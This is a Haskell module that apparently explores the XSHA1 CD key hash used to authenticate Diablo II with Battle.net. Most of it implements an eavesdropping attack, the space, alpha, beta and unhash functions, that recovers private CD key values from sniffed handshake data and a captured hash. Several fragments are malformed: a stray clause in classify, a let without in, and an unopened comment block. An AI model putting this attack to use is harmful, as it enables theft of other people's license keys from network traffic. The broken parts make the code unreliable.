-- | Exploring the CD key hash used to authenticate the game with Battle.net.
module Data.Codec.Blizz.CDHash where 
import Data.Bits
import Data.Word
import qualified Data.Vector as V
import Data.Vector (Vector, (//))
import Text.Printf
import Numeric.Taint.Word32
import Data.Digest.XSHA1.Extend
import Data.Digest.XSHA1.Compress
import Data.Digest.XSHA1

-- | Data accessible to an attacker observing traffic. All plaintext.
-- Only missing piece of CD key info is the private value, which gets hashed.
data Sniff = Sniff 
    { snClientTok :: Word32 -- ^ nonce
    , snServerTok :: Word32 -- ^ nonce
    , snProduct :: Word32   -- ^ decoded from key: 6 classic D2, 10 xpac D2 are common values
    , snPublic :: Word32    -- ^ decoded from key, server has mapping to the private value
    } deriving (Eq,Ord,Show)

-- | Sample D2 CD key hash buffer. XSHA1 of this is sent to the server.
hash :: Sniff -> N -- ^ private value
     -> Vector N
hash s priv = V.fromList $ 
    fmap N [snClientTok s, snServerTok s, snProduct s, snPublic s, 0]
        ++priv:(take 10 . repeat $ N 0)

-- * Test values. (CD keys stripped, get your own.)

sniff1, sniff2 :: Sniff
result1,result2 :: (N,N,N,N,N)

-- redacted 
sniff1 = Sniff 0x98c7130e 0xe96733c6 6 0x00010203
result1 = (N 0xdf75610a, N 0x831300a6, N 0x81c8617f, N 0x9fd22f92, N 0x543ddabc)
-- redacted
sniff2 = Sniff 0x98c7130e 0xe96733c6 10 0x00030201
result2 = (N 0xc6625bbd, N 0x6d91ec5c, N 0xb2736fe9, N 0xc89f19f5, N 0x9621a2c6)

-- * Expand stage analysis.

view :: Vector N -> IO ()
-- ^ Print infix equations for buffer.
view xs = V.mapM_ (putStrLn . pprint) xs

classify :: Vector N -> String
-- ^ Classify DWORDs based on how much knowledge an eavesdropper has of them.
-- X = known value
-- ? = unknown (32 bit CD key private value)
-- # = depends on 5 LSBs of private value
classify = fmap f . V.toList where
    f (N n) = 'X'   
    f U = '?'       
    f (X LShift (N 1) _) = '#'
    group _ = error "Unexpected pattern."

-- * Traffic sniffing attack.

space :: Sniff -> [Vector N]
-- | Possible hash buffer construction from data known to eavesdroper.
--  Since most of the expanded buffer depends just on 5 secret bits, 32
--  different buffers will cover all the possibilities for all but one DWORD.
--  That DWORD is the private key value, and is unknown.
--  Only the relevant 5 bits on the private value are set. It should be re-set
--  afterwards, to a better guess or and unknown.
space s = map (extend . hash s . N) [0..31]

setPriv :: N -> Vector N -> Vector N
setPriv p = (// [(5,p)])

test = finalize $ foldl (iter buff) consts [0..79] where
    buff = setPriv U $ head (space sniff1)

-- | Unknown value is the pivot point.
-- Register states before and after it are marked alpha and beta.
-- Beta has 32 possible values. Alpha just one. Solve for 32 private values.
alpha xs = foldl (iter xs) consts [0..4]
beta xs result = foldl (reti xs) (unfinalize result) (reverse [6..79])
getUnk result xs = let
    (X Add n U,_,_,_,_) = iter (setPriv U xs) (alpha xs) 5
    (b,_,_,_,_) = beta xs result
    b - n

guessedUnknowns sniff res = map (getUnk res) (space sniff)

unhash :: Sniff -> (N,N,N,N,N) -> IO ()
-- ^ Get private values from sniffed data.
-- Some false positives, Binomial(n=31, p=1/32)
-- Straightforward to encode back into human-readable CD key.
unhash sniff res 
    = mapM_ (printf "%x\n")
    . map (\(_,N x)->x)
    . filter (\(a,b)->a==(b.&.31))
    . zip (map N [0..31])
    $ guessedUnknowns sniff res

-- * Debug stuff

printReg (N a, N b, N c, N d, N e) = printf "%x %x %x %x %x\n" a b c d e

-- | Foldl that keeps history.
hfoldl f z0 xs = (z,reverse h) where
    (z,h) = hfoldl' f (z0,[z0]) xs
    hfoldl' f a [] = a
    hfoldl' f (a,h) (b:bs) = 
        let a' = f a b 
        in hfoldl' f (a',a':h) bs

 - *CDHash> let x = extend $ hash sniff1 0xDEADBEEF
 - *CDHash> let (f,fwd) = hfoldl (iter x) consts [0..79]
 - *CDHash> let (_,rev) = hfoldl (reti x) f (reverse [0..79])